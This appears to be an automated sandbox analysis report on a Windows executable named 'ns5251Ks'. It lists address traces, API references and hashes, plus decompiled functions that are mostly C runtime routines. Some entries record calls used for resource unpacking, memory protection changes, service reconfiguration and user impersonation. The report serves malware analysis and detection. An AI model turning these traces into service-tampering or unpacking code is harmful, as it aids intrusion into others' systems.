0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

{, xrefs: 00401E3C
_._, xrefs: 00402257
{, xrefs: 0040205B
., xrefs: 0040201F
4, xrefs: 00401B64
4, xrefs: 00402136
", xrefs: 00401B0F
x, xrefs: 00401E69
[, xrefs: 00401B37
o, xrefs: 00401B8D
V, xrefs: 00402038
{, xrefs: 00401B4B
W, xrefs: 004020E6
', xrefs: 00401AF6
%, xrefs: 004020FA
x, xrefs: 00402088
., xrefs: 00401B0A
h, xrefs: 00401A6F
0, xrefs: 00401BBD
:, xrefs: 00401B28
o, xrefs: 00402159
!, xrefs: 004020CF
x, xrefs: 00401B78
D, xrefs: 00401DFB
V, xrefs: 00401E19
W, xrefs: 00401B14
*, xrefs: 004020E1
___, xrefs: 0040227D
o, xrefs: 00402097
6, xrefs: 004020C5
W, xrefs: 00402033
8, xrefs: 00401BA9
*, xrefs: 00401A1F
E, xrefs: 00401E0F
', xrefs: 00402006
U, xrefs: 004020F5
v, xrefs: 0040206A
{, xrefs: 0040211D
!, xrefs: 0040201A
[, xrefs: 00402047
4, xrefs: 00402074
x, xrefs: 0040214A
v, xrefs: 0040212C
v, xrefs: 00401E4B
5, xrefs: 00402109
), xrefs: 0040202E
v, xrefs: 00401B5A
W, xrefs: 00401B23
!, xrefs: 00401B1E

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 02E17766 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E1778E
Module32First.KERNEL32(00000000,00000224), ref: 02E177AE

Memory Dump Source

Source File: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E16000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e16000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 00b533b821e81ca0d74444cb0a98b10a0a329522550250cfc95f5f0d965a904c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A6F062315407106BE7203AF5A88DF6EB6E8AF89B2AF145538F642D10C0DB70E8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 02DCA1A8 Relevance: 1.8, APIs: 1, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 02DCA4A0

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: 6cb6ce582501a7c987dbde9e5b7f26c4151b87bd7583d214d4146cd4792c04e3
Instruction ID: 49526a9c7baf40568efc4075d07a681cee13df45ea721938a9771b093f7116e6
Opcode Fuzzy Hash: 6cb6ce582501a7c987dbde9e5b7f26c4151b87bd7583d214d4146cd4792c04e3
Instruction Fuzzy Hash: 41C11771D1061E8FDB10CFA8D9857AEBBF1BF48314F248629E859A7394DB749881CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02DC99E8 Relevance: 1.6, APIs: 1, Instructions: 92
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32(?,?,?), ref: 02DC9AC2

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: c7a3bb88cf015c8e2f0784cc6365ba5128ec2826c7d7c5341c2a469a9a33c143
Instruction ID: 46afeb9518970f12424087402df7e1f30d2135cbfb61c54b0943c87316af1c25
Opcode Fuzzy Hash: c7a3bb88cf015c8e2f0784cc6365ba5128ec2826c7d7c5341c2a469a9a33c143
Instruction Fuzzy Hash: 923163B0D042099FDB10CFA9C894BEEBBF1BB48314F248529E815EB340D774A842CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02DC9920 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 02DC99A5

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 2b00acc47ee16b9b6d084c984ac2d37c9f9165570db9297361382ce10397dd6d
Instruction ID: 07c8a8a1d2bdd08f0221cf1f6edc6390a3fd2dcddca3d76045c9268b97ea7d0d
Opcode Fuzzy Hash: 2b00acc47ee16b9b6d084c984ac2d37c9f9165570db9297361382ce10397dd6d
Instruction Fuzzy Hash: ED2115B5C002199FCB14CF9AD984BDEFBF4FB88714F14855AD808AB344D7749940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DC9180 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02DC91F4

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 139394f9a7e4a5b9a128d1177098a730609c02509faffb012f19e0993919484a
Instruction ID: 925ced1864fec463f120371345a5907fdad33124910dacb5ae8c10c73a13f0a8
Opcode Fuzzy Hash: 139394f9a7e4a5b9a128d1177098a730609c02509faffb012f19e0993919484a
Instruction Fuzzy Hash: 3011E2B1D002099FDB10DFAAC984AAEFBF4AB48314F14842AE419A7240C779A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DCA0E8 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32(?,?,?), ref: 02DCA158

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 8e977ac1bc82bbdfbd1861377ade366d4cc5bff406f58d7e166d357ab63cd044
Instruction ID: d98e6dd25cfda0f46e5f8371f1918beb5a594b4ff96cecb99aa107df9028446a
Opcode Fuzzy Hash: 8e977ac1bc82bbdfbd1861377ade366d4cc5bff406f58d7e166d357ab63cd044
Instruction Fuzzy Hash: 4911E2B19006099FDB10CF9AC984BDEFBF4FB48324F10842AE458A7340D378AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DC9350 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 02DC93B2

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 77820a41f70356b4f9ee9e8ce857594bc1912db2f0e472229cddf2dbb66a23d7
Instruction ID: 9daf4db3ea52372555e805d5904132809fc74615c0e1818949bedaad68dec50d
Opcode Fuzzy Hash: 77820a41f70356b4f9ee9e8ce857594bc1912db2f0e472229cddf2dbb66a23d7
Instruction Fuzzy Hash: 711116B19003498FDB10DFAAC5447EEBBF4AB48314F24841AD419A7240C779A945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DC9ED8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 02DC9F37

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 9f5a8f7cebaa49857808cf46c293909240b85fdaaee0f698272fcdb6c17fc1b1
Instruction ID: de28f36cbaf1c113405f5d3688419d2aa9f164cf4661be77453f776b7c82b822
Opcode Fuzzy Hash: 9f5a8f7cebaa49857808cf46c293909240b85fdaaee0f698272fcdb6c17fc1b1
Instruction Fuzzy Hash: 711106B1900659CFDB10CF9AD544BEEFBF4EB48324F24846AD458A3340D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DC9CC8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 02DC9D27

Memory Dump Source

Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: df3d162ec916fbcea85b20b0436b46691bc7f7412c643515a2a936b49ba5d70c
Instruction ID: de1ba98f0cf5942bf5188c27cfc982ffa833f17116a9dac60ce09313f639cb41
Opcode Fuzzy Hash: df3d162ec916fbcea85b20b0436b46691bc7f7412c643515a2a936b49ba5d70c
Instruction Fuzzy Hash: C01103B19006098FDB10CF9AD984BEEFBF4EB48324F24846AD458B3340D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
